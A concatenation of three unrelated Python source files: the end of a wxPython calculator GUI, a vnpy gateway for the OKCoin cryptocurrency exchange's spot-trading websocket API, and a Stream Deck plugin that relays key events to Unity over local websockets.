if self.frame.busy is False and self.frame.init is False:
self._calc()
# BIND FUNCTIONS END
def check_calctext(self):
'''
check calctext
'''
calc_string = str(self.calc_text.GetValue())
self.button['='].Disable()
if self.frame.busy is False:
seq = self.__qc.get_seq(calc_string, self.frame.base)
if seq:
self.button['='].Enable()
def _calc(self):
# disable user input
self.frame.busy = True
self.button['='].Disable()
# exec and draw job status
qc_result = self.__qc.exec_calc(str(self.calc_text.GetValue()),
self.frame.base)
self._draw(qc_result)
# init flag reset
self.frame.init = True
# wait for result of qc
wait_th = threading.Thread(name='wait_th', target=self._wait_anser)
wait_th.start()
def _draw(self, qc_result):
'''
thread
GUI functions require that are called on main thread,
so use wx.CallAfter as caller function.
'''
[status, ans] = qc_result
wx.CallAfter(self.frame.SetStatusText, str(status))
if ans is not None and len(ans) > 15:
wx.CallAfter(self.show_alart, 'Anser', str(ans))
wx.CallAfter(self.calc_text.SetValue, str(ans))
def _wait_anser(self):
while True:
time.sleep(0.5)
wx.CallAfter(self.frame.SetStatusText,
'Phase {0} {1}'
.format(self.__qc.phase[-1][0], self.__qc.phase[-1][1]))
if self.__qc.wait is False:
self._draw(self.__qc.last)
wx.CallAfter(self.button['='].Enable)
self.frame.busy = False
break
|
okcoinGateway.py
|
# encoding: UTF-8
'''
vn.okcoin的gateway接入
注意:
1. 前仅支持USD和CNY的现货交易,USD的期货合约交易暂不支持
'''
import os
import json
from datetime import datetime
from time import sleep
from copy import copy
from threading import Condition
from Queue import Queue
from threading import Thread
from time import sleep
from vnpy.api.okcoin import vnokcoin
from trader.vtGateway import *
from trader.vtFunction import load_json_path
from language.chinese.vt_constant import *
# 价格类型映射
priceTypeMap = {}
priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE)
priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE)
priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE)
priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE)
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# 方向类型映射
directionMap = {}
directionMapReverse = {v: k for k, v in directionMap.items()}
# 委托状态印射
statusMap = {}
statusMap[-1] = STATUS_CANCELLED
statusMap[0] = STATUS_NOTTRADED
statusMap[1] = STATUS_PARTTRADED
statusMap[2] = STATUS_ALLTRADED
statusMap[4] = STATUS_UNKNOWN
############################################
# 交易合约代码
############################################
# USD
BTC_USD_SPOT = 'BTC_USD_SPOT'
BTC_USD_THISWEEK = 'BTC_USD_THISWEEK'
BTC_USD_NEXTWEEK = 'BTC_USD_NEXTWEEK'
BTC_USD_QUARTER = 'BTC_USD_QUARTER'
LTC_USD_SPOT = 'LTC_USD_SPOT'
LTC_USD_THISWEEK = 'LTC_USD_THISWEEK'
LTC_USD_NEXTWEEK = 'LTC_USD_NEXTWEEK'
LTC_USD_QUARTER = 'LTC_USD_QUARTER'
ETH_USD_SPOT = 'ETH_USD_SPOT'
ETH_USD_THISWEEK = 'ETH_USD_THISWEEK'
ETH_USD_NEXTWEEK = 'ETH_USD_NEXTWEEK'
ETH_USD_QUARTER = 'ETH_USD_QUARTER'
# CNY
BTC_CNY_SPOT = 'BTC_CNY_SPOT'
LTC_CNY_SPOT = 'LTC_CNY_SPOT'
ETH_CNY_SPOT = 'ETH_CNY_SPOT'
# 印射字典
spotSymbolMap = {}
spotSymbolMap['ltc_usd'] = LTC_USD_SPOT
spotSymbolMap['btc_usd'] = BTC_USD_SPOT
spotSymbolMap['ETH_usd'] = ETH_USD_SPOT
spotSymbolMap['ltc_cny'] = LTC_CNY_SPOT
spotSymbolMap['btc_cny'] = BTC_CNY_SPOT
spotSymbolMap['eth_cny'] = ETH_CNY_SPOT
spotSymbolMapReverse = {v: k for k, v in spotSymbolMap.items()}
############################################
# Channel和Symbol的印射
############################################
channelSymbolMap = {}
# USD
channelSymbolMap['ok_sub_spotusd_btc_ticker'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_ticker'] = LTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_eth_ticker'] = ETH_USD_SPOT
channelSymbolMap['ok_sub_spotusd_btc_depth_20'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_depth_20'] = LTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_eth_depth_20'] = ETH_USD_SPOT
# CNY
channelSymbolMap['ok_sub_spotcny_btc_ticker'] = BTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_ltc_ticker'] = LTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_eth_ticker'] = ETH_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_btc_depth_20'] = BTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_ltc_depth_20'] = LTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_eth_depth_20'] = ETH_CNY_SPOT
########################################################################
class OkcoinGateway(VtGateway):
"""OkCoin接口"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='OKCOIN'):
"""Constructor"""
super(OkcoinGateway, self).__init__(eventEngine, gatewayName)
self.api = Api(self)
self.leverage = 0
self.connected = False
self.fileName = self.gatewayName + '_connect.json'
self.filePath = load_json_path(self.fileName, __file__)
#----------------------------------------------------------------------
def connect(self):
"""连接"""
# 载入json文件
try:
f = file(self.filePath)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
# 解析json文件
setting = json.load(f)
try:
host = str(setting['host'])
apiKey = str(setting['apiKey'])
secretKey = str(setting['secretKey'])
trace = setting['trace']
leverage = setting['leverage']
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
# 初始化接口
self.leverage = leverage
if host == 'CNY':
host = vnokcoin.OKCOIN_CNY
else:
host = vnokcoin.OKCOIN_USD
self.api.active = True
self.api.connect(host, apiKey, secretKey, trace)
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'接口初始化成功'
self.onLog(log)
# 启动查询
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
def subscribe(self, subscribeReq):
"""订阅行情"""
pass
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
return self.api.spotSendOrder(orderReq)
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.api.spotCancel(cancelOrderReq)
#----------------------------------------------------------------------
def qryAccount(self):
"""查询账户资金"""
self.api.spotUserInfo()
#----------------------------------------------------------------------
def qryPosition(self):
"""查询持仓"""
pass
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.api.active = False
self.api.close()
#----------------------------------------------------------------------
def initQuery(self):
"""初始化连续查询"""
if self.qryEnabled:
# 需要循环的查询函数列表
self.qryFunctionList = [self.qryAccount]
self.qryCount = 0 # 查询触发倒计时
self.qryTrigger = 2 # 查询触发点
self.qryNextFunction = 0 # 上次运行的查询函数索引
self.startQuery()
#----------------------------------------------------------------------
def query(self, event):
"""注册到事件处理引擎上的查询函数"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
# 清空倒计时
self.qryCount = 0
# 执行查询函数
function = self.qryFunctionList[self.qryNextFunction]
function()
# 计算下次查询函数的索引,如果超过了列表长度,则重新设为0
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
def startQuery(self):
"""启动连续查询"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
def setQryEnabled(self, qryEnabled):
"""设置是否要启动循环查询"""
self.qryEnabled = qryEnabled
########################################################################
class Api(vnokcoin.OkCoinApi):
"""OkCoin的API实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(Api, self).__init__()
self.gateway = gateway # gateway对象
self.gatewayName = gateway.gatewayName # gateway对象名称
self.active = False # 若为True则会在断线后自动重连
self.cbDict = {}
self.tickDict = {}
self.orderDict = {}
self.localNo = 0 # 本地委托号
self.localNoQueue = Queue() # 未收到系统委托号的本地委托号队列
self.localNoDict = {} # key为本地委托号,value为系统委托号
self.orderIdDict = {} # key为系统委托号,value为本地委托号
self.cancelDict = {} # key为本地委托号,value为撤单请求
self.initCallback()
#----------------------------------------------------------------------
def onMessage(self, ws, evt):
"""信息推送"""
data = self.readData(evt)[0]
channel = data['channel']
callback = self.cbDict[channel]
callback(data)
#----------------------------------------------------------------------
def onError(self, ws, evt):
"""错误推送"""
error = VtErrorData()
error.gatewayName = self.gatewayName
error.errorMsg = str(evt)
self.gateway.onError(error)
#----------------------------------------------------------------------
def onClose(self, ws):
"""接口断开"""
# 如果尚未连上,则忽略该次断开提示
if not self.gateway.connected:
return
self.gateway.connected = False
self.writeLog(u'服务器连接断开')
# 重新连接
if self.active:
def reconnect():
while not self.gateway.connected:
self.writeLog(u'等待10秒后重新连接')
sleep(10)
if not self.gateway.connected:
self.reconnect()
t = Thread(target=reconnect)
t.start()
#----------------------------------------------------------------------
def onOpen(self, ws):
"""连接成功"""
self.gateway.connected = True
self.writeLog(u'服务器连接成功')
# 连接后查询账户和委托数据
self.spotUserInfo()
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_LTC, '-1')
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_BTC, '-1')
self.spotOrderInfo(vnokcoin.TRADING_SYMBOL_ETH, '-1')
# 连接后订阅现货的成交和账户数据
self.subscribeSpotTrades()
self.subscribeSpotUserInfo()
self.subscribeSpotTicker(vnokcoin.SYMBOL_BTC)
self.subscribeSpotTicker(vnokcoin.SYMBOL_LTC)
self.subscribeSpotTicker(vnokcoin.SYMBOL_ETH)
self.subscribeSpotDepth(vnokcoin.SYMBOL_BTC, vnokcoin.DEPTH_20)
self.subscribeSpotDepth(vnokcoin.SYMBOL_LTC, vnokcoin.DEPTH_20)
self.subscribeSpotDepth(vnokcoin.SYMBOL_ETH, vnokcoin.DEPTH_20)
# 如果连接的是USD网站则订阅期货相关回报数据
if self.currency == vnokcoin.CURRENCY_USD:
self.subscribeFutureTrades()
self.subscribeFutureUserInfo()
self.subscribeFuturePositions()
# 返回合约信息
if self.currency == vnokcoin.CURRENCY_CNY:
l = self.generateCnyContract()
else:
l = self.generateUsdContract()
for contract in l:
contract.gatewayName = self.gatewayName
self.gateway.onContract(contract)
#----------------------------------------------------------------------
def writeLog(self, content):
"""快速记录日志"""
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = content
self.gateway.onLog(log)
#----------------------------------------------------------------------
def initCallback(self):
"""初始化回调函数"""
# USD_SPOT
self.cbDict['ok_sub_spotusd_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_eth_ticker'] = self.onTicker
self.cbDict['ok_sub_spotusd_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotusd_ltc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotusd_eth_depth_20'] = self.onDepth
self.cbDict['ok_spotusd_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotusd_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotusd_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotusd_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotusd_trade'] = self.onSpotTrade
self.cbDict['ok_spotusd_cancel_order'] = self.onSpotCancelOrder
# CNY_SPOT
self.cbDict['ok_sub_spotcny_btc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_ltc_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_eth_ticker'] = self.onTicker
self.cbDict['ok_sub_spotcny_btc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotcny_ltc_depth_20'] = self.onDepth
self.cbDict['ok_sub_spotcny_eth_depth_20'] = self.onDepth
self.cbDict['ok_spotcny_userinfo'] = self.onSpotUserInfo
self.cbDict['ok_spotcny_orderinfo'] = self.onSpotOrderInfo
self.cbDict['ok_sub_spotcny_userinfo'] = self.onSpotSubUserInfo
self.cbDict['ok_sub_spotcny_trades'] = self.onSpotSubTrades
self.cbDict['ok_spotcny_trade'] = self.onSpotTrade
self.cbDict['ok_spotcny_cancel_order'] = self.onSpotCancelOrder
# USD_FUTURES
#----------------------------------------------------------------------
def onTicker(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
rawData = data['data']
tick.highPrice = float(rawData['high'])
tick.lowPrice = float(rawData['low'])
tick.lastPrice = float(rawData['last'])
tick.volume = float(rawData['vol'])
#tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onDepth(self, data):
""""""
if 'data' not in data:
return
channel = data['channel']
symbol = channelSymbolMap[channel]
if symbol not in self.tickDict:
tick = VtTickData()
tick.symbol = symbol
tick.vtSymbol = symbol
tick.gatewayName = self.gatewayName
self.tickDict[symbol] = tick
else:
tick = self.tickDict[symbol]
if 'data' not in data:
return
rawData = data['data']
tick.bidPrice1, tick.bidVolume1 = rawData['bids'][0]
tick.bidPrice2, tick.bidVolume2 = rawData['bids'][1]
tick.bidPrice3, tick.bidVolume3 = rawData['bids'][2]
tick.bidPrice4, tick.bidVolume4 = rawData['bids'][3]
tick.bidPrice5, tick.bidVolume5 = rawData['bids'][4]
tick.askPrice1, tick.askVolume1 = rawData['asks'][-1]
tick.askPrice2, tick.askVolume2 = rawData['asks'][-2]
tick.askPrice3, tick.askVolume3 = rawData['asks'][-3]
tick.askPrice4, tick.askVolume4 = rawData['asks'][-4]
tick.askPrice5, tick.askVolume5 = rawData['asks'][-5]
tick.date, tick.time = generateDateTime(rawData['timestamp'])
newtick = copy(tick)
self.gateway.onTick(newtick)
#----------------------------------------------------------------------
def onSpotUserInfo(self, data):
"""现货账户资金推送"""
rawData = data['data']
info = rawData['info']
funds = rawData['info']['funds']
# 持仓信息
for symbol in ['btc', 'ltc', 'eth', self.currency]:
if symbol in funds['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(funds['freezed'][symbol])
pos.position = pos.frozen + float(funds['free'][symbol])
self.gateway.onPosition(pos)
# 账户资金
account = VtAccountData()
account.gatewayName = self.gatewayName
account.accountID = self.gatewayName
account.vtAccountID = account.accountID
account.balance = float(funds['asset']['net'])
self.gateway.onAccount(account)
#----------------------------------------------------------------------
def onSpotSubUserInfo(self, data):
"""现货账户资金推送"""
if 'data' not in data:
return
rawData = data['data']
info = rawData['info']
# 持仓信息
for symbol in ['btc', 'ltc', 'eth', self.currency]:
if symbol in info['free']:
pos = VtPositionData()
pos.gatewayName = self.gatewayName
pos.symbol = symbol
pos.vtSymbol = symbol
pos.vtPositionName = symbol
pos.direction = DIRECTION_NET
pos.frozen = float(info['freezed'][symbol])
pos.position = pos.frozen + float(info['free'][symbol])
self.gateway.onPosition(pos)
#----------------------------------------------------------------------
def onSpotSubTrades(self, data):
"""成交和委托推送"""
if 'data' not in data:
return
rawData = data['data']
# 本地和系统委托号
orderId = str(rawData['orderId'])
localNo = self.orderIdDict[orderId]
# 委托信息
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[rawData['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = float(rawData['tradeUnitPrice'])
order.totalVolume = float(rawData['tradeAmount'])
order.direction, priceType = priceTypeMap[rawData['tradeType']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = float(rawData['completedTradeAmount'])
order.status = statusMap[rawData['status']]
self.gateway.onOrder(copy(order))
# 成交信息
if 'sigTradeAmount' in rawData and float(
rawData['sigTradeAmount']) > 0:
trade = VtTradeData()
trade.gatewayName = self.gatewayName
trade.symbol = spotSymbolMap[rawData['symbol']]
trade.vtSymbol = order.symbol
trade.tradeID = str(rawData['id'])
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = localNo
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
trade.price = float(rawData['sigTradePrice'])
trade.volume = float(rawData['sigTradeAmount'])
trade.direction, priceType = priceTypeMap[rawData['tradeType']]
trade.tradeTime = datetime.now().strftime('%H:%M:%S')
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onSpotOrderInfo(self, data):
"""委托信息查询回调"""
rawData = data['data']
for d in rawData['orders']:
self.localNo += 1
localNo = str(self.localNo)
orderId = str(d['order_id'])
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
if orderId not in self.orderDict:
order = VtOrderData()
order.gatewayName = self.gatewayName
order.symbol = spotSymbolMap[d['symbol']]
order.vtSymbol = order.symbol
order.orderID = localNo
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
order.price = d['price']
order.totalVolume = d['amount']
order.direction, priceType = priceTypeMap[d['type']]
self.orderDict[orderId] = order
else:
order = self.orderDict[orderId]
order.tradedVolume = d['deal_amount']
order.status = statusMap[d['status']]
self.gateway.onOrder(copy(order))
#----------------------------------------------------------------------
def generateSpecificContract(self, contract, symbol):
"""生成合约"""
new = copy(contract)
new.symbol = symbol
new.vtSymbol = symbol
new.name = symbol
return new
#----------------------------------------------------------------------
def generateCnyContract(self):
"""生成CNY合约信息"""
contractList = []
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(
self.generateSpecificContract(
contract, BTC_CNY_SPOT))
contractList.append(
self.generateSpecificContract(
contract, LTC_CNY_SPOT))
contractList.append(
self.generateSpecificContract(
contract, ETH_CNY_SPOT))
return contractList
#----------------------------------------------------------------------
def generateUsdContract(self):
"""生成USD合约信息"""
contractList = []
# 现货
contract = VtContractData()
contract.exchange = EXCHANGE_OKCOIN
contract.productClass = PRODUCT_SPOT
contract.size = 1
contract.priceTick = 0.01
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_SPOT))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_SPOT))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_SPOT))
# 期货
contract.productClass = PRODUCT_FUTURES
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_THISWEEK))
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_NEXTWEEK))
contractList.append(
self.generateSpecificContract(
contract, BTC_USD_QUARTER))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_THISWEEK))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_NEXTWEEK))
contractList.append(
self.generateSpecificContract(
contract, LTC_USD_QUARTER))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_THISWEEK))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_NEXTWEEK))
contractList.append(
self.generateSpecificContract(
contract, ETH_USD_QUARTER))
return contractList
#----------------------------------------------------------------------
def onSpotTrade(self, data):
"""委托回报"""
rawData = data['data']
orderId = rawData['order_id']
# 尽管websocket接口的委托号返回是异步的,但经过测试是
# 符合先发现回的规律,因此这里通过queue获取之前发送的
# 本地委托号,并把它和推送的系统委托号进行映射
localNo = self.localNoQueue.get_nowait()
self.localNoDict[localNo] = orderId
self.orderIdDict[orderId] = localNo
# 检查是否有系统委托号返回前就发出的撤单请求,若有则进
# 行撤单操作
if localNo in self.cancelDict:
req = self.cancelDict[localNo]
self.spotCancel(req)
del self.cancelDict[localNo]
#----------------------------------------------------------------------
def onSpotCancelOrder(self, data):
"""撤单回报"""
pass
#----------------------------------------------------------------------
def spotSendOrder(self, req):
"""发单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
type_ = priceTypeMapReverse[(req.direction, req.priceType)]
self.spotTrade(symbol, type_, str(req.price), str(req.volume))
# 本地委托号加1,并将对应字符串保存到队列中,返回基于本地委托号的vtOrderID
self.localNo += 1
self.localNoQueue.put(str(self.localNo))
vtOrderID = '.'.join([self.gatewayName, str(self.localNo)])
return vtOrderID
#----------------------------------------------------------------------
def spotCancel(self, req):
"""撤单"""
symbol = spotSymbolMapReverse[req.symbol][:4]
localNo = req.orderID
if localNo in self.localNoDict:
orderID = self.localNoDict[localNo]
self.spotCancelOrder(symbol, orderID)
else:
# 如果在系统委托号返回前客户就发送了撤单请求,则保存
# 在cancelDict字典中,等待返回后执行撤单任务
self.cancelDict[localNo] = req
#----------------------------------------------------------------------
def generateDateTime(s):
"""生成时间"""
dt = datetime.fromtimestamp(float(s) / 1e3)
time = dt.strftime("%H:%M:%S.%f")
date = dt.strftime("%Y%m%d")
return date, time
|
main.py
|
# Setup logging
import logging
# logging.basicConfig(filename="main.log", filemode="w", level=logging.DEBUG)
import sys
import websocket
import json
import unity_socket
from threading import Thread
from event_data import EventData
from actions import InvokeMethodAction, SetFieldPropertyAction, PlayModeAction, PauseModeAction, ExecuteMenu
# Open the web socket to Stream Deck
def open_streamdeck_socket():
global sd_socket
websocket.enableTrace(True) # <- Not sure if needed
# Use 127.0.0.1 because Windows needs 300ms to resolve localhost
host = "ws://127.0.0.1:%s" % SD_PORT
sd_socket = websocket.WebSocketApp(host, on_message=on_message, on_error=on_error, on_close=on_close)
sd_socket.on_open = on_open
sd_socket.run_forever()
def on_message(ws, message):
logging.debug(message)
data = EventData(message)
# Switch function blocks
def will_appear():
# Add current instance if is not in actions array
if data.context in actions:
return
# Map events to function blocks
mapped_action_classes = {
get_action_name("invoke-method"): InvokeMethodAction,
get_action_name("set-field-property"): SetFieldPropertyAction,
get_action_name("play-mode"): PlayModeAction,
get_action_name("pause-mode"): PauseModeAction,
get_action_name("execute-menu"): ExecuteMenu
}
# If crashes, probably mapped_action_classes is missing a new class
actions[data.context] = mapped_action_classes[data.action](
data.context,
data.settings,
data.coordinates,
data.state
)
def will_disappear():
# Remove current instance from array
if data.context in actions:
actions.pop(data.context)
def did_receive_settings():
# Set settings
if data.context in actions:
actions[data.context].set_settings(data.settings)
def key_down():
# Send onKeyDown event to actions
if data.context in actions:
action = actions[data.context]
action.on_key_down(data.state)
sent = u_socket.send(action.get_action_name(), action.context, action.settings, action.state)
if not sent:
show_alert(data.context)
def key_up():
# Send onKeyUp event to actions
if data.context in actions:
action = actions[data.context]
action.on_key_up(data.state)
# Support for stupid unavoidable state change manually triggered by Elgato
if action.state_changed:
# setTimeout(function(){ Utils.setState(self.context, self.state); }, 4000);
set_state(action.context, action.state)
def event_default():
pass
# Map events to function blocks
{
"willAppear": will_appear,
"willDisappear": will_disappear,
"didReceiveSettings": did_receive_settings,
"keyDown": key_down,
"keyUp": key_up
}.get(data.event, event_default)()
def on_error(ws, error):
logging.error(error)
def on_close(ws):
logging.info("### closed ###")
def on_open(ws):
# Register plugin to Stream Deck
def register_plugin():
json_data = {
"event": SD_REGISTER_EVENT,
"uuid": SD_PLUGIN_UUID
}
ws.send(json.dumps(json_data))
Thread(target=register_plugin).start()
# Create the web socket for Unity
def create_unity_socket():
global u_socket
u_socket = unity_socket.UnityWebSocket(UNITY_PORT)
u_socket.on_play_mode_state_changed = lambda data: set_state_all_actions(PlayModeAction,
data.payload["state"])
u_socket.on_pause_mode_state_changed = lambda data: set_state_all_actions(PauseModeAction,
data.payload["state"])
u_socket.on_set_title = lambda data: set_title_by_settings(data.payload["group-id"],
data.payload["id"],
data.payload["title"])
u_socket.on_set_image = lambda data: set_image_by_settings(data.payload["group-id"],
data.payload["id"],
data.payload["image"])
u_socket.on_set_state = lambda data: set_state(data.context,
data.payload["state"])
u_socket.start()
def get_action_name(action_name):
return "%s.%s" % (BASE_PLUGIN_NAME, action_name)
def set_state_all_actions(class_type, state):
context_list = get_actions_context_by_class(class_type)
for context in context_list:
set_state(context, state)
def set_title_by_settings(group_id, member_id, title):
if sd_socket is None:
return
context = get_action_context_by_settings(group_id, member_id)
if context is None:
return
data = {
"event": "setTitle",
"context": context,
"payload": {
"title": title
}
}
logging.info("Changing title from context %s to %s" % (context, title))
sd_socket.send(json.dumps(data))
def set_image_by_settings(group_id, member_id, image):
if sd_socket is None:
return
context = get_action_context_by_settings(group_id, member_id)
if context is None:
return
data = {
"event": "setImage",
"context": context,
"payload": {
"image": image
}
}
logging.info("Changing image from context %s to %s" % (context, image))
sd_socket.send(json.dumps(data))
def get_action_context_by_settings(group_id, member_id):
for key, value in actions.items():
if value.settings.get("id") != member_id:
continue
if value.settings.get("group-id") != group_id:
continue
return key
def get_actions_context_by_class(class_type):
results = []
for key, value in actions.items():
if isinstance(value, class_type):
results.append(key)
return results
# Set the state of a key
def set_state(context, state):
if sd_socket is None:
return
if context not in actions:
return
data = {
"event": "setState",
"context": context,
"payload": {
"state": state
}
}
sd_socket.send(json.dumps(data))
actions[context].set_state(state)
# Show alert icon on the key
def show_alert(context):
if sd_socket is None:
return
data = {
"event": "showAlert",
"context": context
}
sd_socket.send(json.dumps(data))
if __name__ == "__main__":
logging.info("### Start ###")
BASE_PLUGIN_NAME = "com.adamcarballo.unity-integration"
actions = {}
sd_socket = None
u_socket = None
UNITY_PORT = 2245
# Setup the web socket and handle communication
# -port [The port that should be used to create the WebSocket]
SD_PORT = sys.argv[2]
# -pluginUUID [A unique identifier string that should be used to register the plugin once the web socket is opened]
SD_PLUGIN_UUID = sys.argv[4]
# -registerEvent [The event type that should be used to register the plugin once the web socket is opened]
SD_REGISTER_EVENT = sys.argv[6]
# -info [A stringified json containing the Stream Deck application information and devices information.]
SD_INFO = sys.argv[8]
# Create Unity web socket
Thread(target=create_unity_socket, daemon=True).start()
# Open the web socket to Stream Deck
# Thread(target=open_streamdeck_socket, daemon=True).start()
open_streamdeck_socket()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.